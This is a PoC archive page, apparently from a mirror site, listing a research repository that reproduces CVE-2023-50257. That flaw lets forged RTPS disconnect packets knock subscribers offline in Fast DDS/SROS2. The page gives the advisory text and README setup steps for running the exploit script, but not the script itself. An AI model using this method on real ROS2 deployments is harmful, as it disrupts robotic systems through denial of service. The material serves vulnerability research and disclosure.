Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1310 CNY

100%
Buy Us a Coffee

CVE-2023-50257 PoC — Disconnect Vulnerability in RTPS Packets Used by SROS2

Source
https://github.com/Jminis/CVE-2023-50257
Associated Vulnerability
Title:Disconnect Vulnerability in RTPS Packets Used by SROS2 (CVE-2023-50257)
Description:eProsima Fast DDS (formerly Fast RTPS) is a C++ implementation of the Data Distribution Service standard of the Object Management Group. Even with the application of SROS2, due to the issue where the data (`p[UD]`) and `guid` values used to disconnect between nodes are not encrypted, a vulnerability has been discovered where a malicious attacker can forcibly disconnect a Subscriber and can deny a Subscriber attempting to connect. Afterwards, if the attacker sends the packet for disconnecting, which is data (`p[UD]`), to the Global Data Space (`239.255.0.1:7400`) using the said Publisher ID, all the Subscribers (Listeners) connected to the Publisher (Talker) will not receive any data and their connection will be disconnected. Moreover, if this disconnection packet is sent continuously, the Subscribers (Listeners) trying to connect will not be able to do so. Since the initial commit of the `SecurityManager.cpp` code (`init`, `on_process_handshake`) on Nov 8, 2016, the Disconnect Vulnerability in RTPS Packets Used by SROS2 has been present prior to versions 2.13.0, 2.12.2, 2.11.3, 2.10.3, and 2.6.7.
Description
This repository is for research purposes (2025 Sejong Univ. Capstone Design)
Readme
# ROS2 CVE-2023-50257 Reproduction

## 🔍 Overview

This repository is based on a PoC for CVE-2023-50257 and automates the collection of RTPS packets, parses GUID values, and sends a successful DoS packet.
**CVE-2023-50257** is a known security vulnerability in ROS2 (Robot Operating System 2).
- [https://github.com/eProsima/Fast-DDS/security/advisories/GHSA-v5r6-8mvh-cp98](https://github.com/eProsima/Fast-DDS/security/advisories/GHSA-v5r6-8mvh-cp98)
- [https://github.com/Desglaneurs/BoB_Des_glaneurs/tree/main/CVE-2023-50257](https://github.com/Desglaneurs/BoB_Des_glaneurs/tree/main/CVE-2023-50257)
> ⚠️ **This project is strictly for educational and research purposes. Do not use it in production or against systems you do not own or have permission to test.**


## 🧪 Environment

- OS: Ubuntu 22.04
- ROS2 version: ros2 humble / fastdds(2.6.3) / rmw(6.2.3)

## 🚀 Getting Started

1. Build the Docker image to set up the environment:
```bash
git clone https://github.com/Jminis/CVE-2023-50257.git
docker build -t cve_2023_50257 .
docker network create ros2_net

```
2. In Terminal 1 (listener), run the following command:
```bash
docker run -it --net ros2_net --name talker cve_2023_50257
ros2 run demo_nodes_cpp talker
```

3. In Terminal 2 (talker), run the following command:
```bash
docker run -it --net ros2_net --name talker cve_2023_50257
ros2 run demo_nodes_cpp talker
```

4. In Terminal 3 (host), execute `ex.py`
```bash
pip install scapy
sudo -E python3 ex.py
```

## 📺 Demo
![DEMO](https://github.com/Jminis/CVE-2023-50257/blob/main/DEMO/TEST.gif)
File Snapshot

Log in to view the POC file snapshot cached by Shenlong Bot

Log in to view
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →